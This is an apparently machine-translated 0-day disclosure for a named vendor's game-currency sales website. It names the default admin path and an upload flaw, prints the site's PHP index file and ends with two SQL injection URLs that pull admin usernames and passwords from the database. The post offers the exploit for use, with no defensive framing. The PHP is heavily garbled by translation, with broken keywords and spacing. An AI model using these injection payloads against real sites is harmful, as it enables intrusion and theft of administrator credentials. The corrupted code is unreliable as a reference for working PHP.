Mini overseas game currency generation and training system 0 day

Author: Wavelet

WeChat overseas game currency sales and training system 0 day

Manufacturer: http://www.hh-e.cn/

Arbitrary hhadmin/up. php Upload Vulnerability

Default background address: hhadmin

Funnel file: index. php

Bytes ----------------------------------------------------------------------------------------------------------------
<? Php
Require ("inc/conn. php ");

$ SQL _config = $ db-> query ("select title, content from g_config ");

While ($ rs_config = $ db-> fetch_array ($ SQL _config) {$ web_config [$ rs_config [0] = $ rs_config [1];}

If ($ web_config [webclose]! = 0) {exit ($ web_config ["webclose"]);}

If (isset ($ _ SESSION ["huobi"]) {$ nowhuobi =$ _ SESSION ["huobi"];} else {$ nowhuobi = $ web_config ["webhuobi"];}

$ Huobi_idx = $ db-> get_one ("select title, stitle, huilv from g_huobi where cntitle = $ nowhuobi ");

If ($ huobi_idx ){

$ Huobi_title = $ huobi_idx [0];

$ Huobi_stitle = $ huobi_idx [1];

$ Huobi_huilv = $ huobi_idx [2];

} Else {unset ($ _ SESSION [huobi]); exit ("Currency Error! ");}

$ Time = date ("Y-m-d H: I: s", time ()-600 );
$ Count = $ db-> get_one ("select * from g_visits where addtime> $ time and ip = $ user_ip ");
If (! $ Count ){
$ Db-> query ("insert into g_visits (ip, addtime) values ($ user_ip, $ showtime )");
}

Switch ($ action ){

Case "ad ";

$ Type = isset ($ _ GET ["type"])? $ _ GET ["type"]:;

If ($ type = "flash") {require ("inc/modules/flash. php ");}

Elseif ($ type = other ){

$ Id = (isset ($ _ GET [id])? $ _ GET [id] :);

If (! $ Id) {msg (0 );}

$ Id_array = checkid ($ id );

$ Id = implode (_, $ id_array );

$ Ad_other = $ db-> get_one ("select title, pic from g_ad where id = $ id ");

If (! $ Ad_other) {msg (404 );}

Echo "document. write (" <a href = index. php? Action = ad & type = go & id = $ id target = ad> </a> ");";}

Elseif ($ type = go ){

$ Id = (isset ($ _ GET [id])? $ _ GET [id] :);

If (! $ Id) {msg (0 );}

$ Id_array = checkid ($ id );

$ Id = implode (_, $ id_array );

$ Ad_url = $ db-> get_one ("select url from g_ad where id = $ id ");

If (! $ Ad_url) {msg (404 );}

$ Db-> query ("update g_ad set click = click + 1 where id = $ id ");

// Header ("Location:". $ ad_url [0]);
Echo "<script> location. href = {$ ad_url [0]} </script> ";

}

Else {msg (0 );}

Break;

Case "paypal ";

$ Req = cmd = _ policy-validate;

Foreach ($ _ POST as $ key => $ value ){

$ Value = urlencode (stripslashes ($ value ));

$ Req. = "& $ key = $ value ";

}

$ Header. = "POST/cgi-bin/webscr HTTP/1.0 ";

$ Header. = "Content-Type: application/x-www-form-urlencoded ";

$ Header. = "Content-Length:". strlen ($ req )."";

$ Fp = fsockopen (ssl: // www.paypal.com, 443, $ errno, $ errstr, 30 );

$ Item_name = $ _ POST [item_name];

$ Item_number = $ _ POST [item_number];

$ Payment_status = $ _ POST [payment_status];

$ Payment_amount =unt _ POST [mc_gross];

$ Payment_currency = $ _ POST [mc_currency];

$ Txn_id = $ _ POST [txn_id];

$ Receiver_email =$ _ POST [receiver_email];

$ Payer_email = $ _ POST [payer_email];

If (! $ Fp ){

// HTTP ERROR

} Else {

Fputs ($ fp, $ header. $ req );

While (! Feof ($ fp )){

$ Res = fgets ($ fp, 1024 );

If (strcmp ($ res, "VERIFIED") = 0 ){

$ Order_id = $ item_number;

$ Db-> query ("update g_jbdd set paypal_back = $ payer_email, paypal_money = $ payment_amount $ payment_currency where order_id = $ order_id ");

$ Db-> query ("update g_dldd set paypal_back = $ payer_email, paypal_money = $ payment_amount $ payment_currency where order_id = $ order_id ");

$ Db-> query ("update g_zhdd set paypal_back = $ payer_email, paypal_money = $ payment_amount $ payment_currency where order_id = $ order_id ");

$ Db-> query ("update g_zbdd set paypal_back = $ payer_email, paypal_money = $ payment_amount $ payment_currency where order_id = $ order_id ");

}

Else if (strcmp ($ res, "INVALID") = 0 ){

// Log for manual investigation

}

}

Fclose ($ fp );

}

Break;

Case "login ";

Require ("inc/modules/login. php ");

Break;

Case "Currency ";

$ _ SESSION ["huobi"] = $ _ GET ["type"];

Exit ("<script> history. back (); </script> ");

Break;

Default:
$ Webnowurl = $ _ SERVER ["REQUEST_URI"];

$ Webnowurl = substr ($ webnowurl, 1 );

Require ("inc/libs/Smarty. class. php ");

$ Smarty = new Smarty ();

$ Smarty-> caching = $ web_config [webcache];

$ Smarty-> compile_check = true;

$ Smarty-> debugging = false;

$ Main_page = isset ($ _ GET [main_page])? $ _ GET [main_page]:;

If (! $ Main_page) {$ main_page = index ;}

If (file_exists ("inc/modules/$ main_page.php") {require ("inc/modules/$ main_page.php ");}

If (! File_exists ("templates/". $ web_config [webstyle]. "/$ main_page.php") {msg (404 );}

$ SQL _huobi = $ db-> query ("select cntitle from g_huobi where cntitle <> $ nowhuobi ");

While ($ rs_huobi = $ db-> fetch_array ($ SQL _huobi )){

$ Huobilist [] = array ("cntitle" => $ rs_huobi [0]);

}

$ Smarty-> assign (webname, $ web_config [webname]);

$ Smarty-> assign ("webhtml", $ web_config [webhtml]);

$ Smarty-> assign (webkeywords, $ web_config [keywords]);

$ Smarty-> assign (webdescription, $ web_config [description]);

$ Smarty-> assign (nowhuobi, $ nowhuobi );

$ Smarty-> assign ("huobi", $ huobilist );

$ Smarty-> assign ("huobi_title", $ huobi_title );

$ Smarty-> assign ("huobi_stitle", $ huobi_stitle );

$ Smarty-> assign ("huobi_huilv", $ huobi_huilv );

$ Smarty-> assign ("webnowurl", $ webnowurl );

$ Smarty-> display ($ web_config [webstyle]. "/$ main_page.php ");

$ _ SESSION [nowurl] =_ _ SERVER [REQUEST_URI];

Break;

}

$ Db-> close ();

?>
Bytes -----------------------------------------------------------------------------------------------------------------
Exp
Http://site.com/index.php? Main_page = buyitems & gid =-10 union select 1, admin_name from yu_admin/* xiaobo

Http://site.com/index.php? Main_page = buyitems & gid =-10 union select 1, admin_pwd from yu_admin/* xiaobo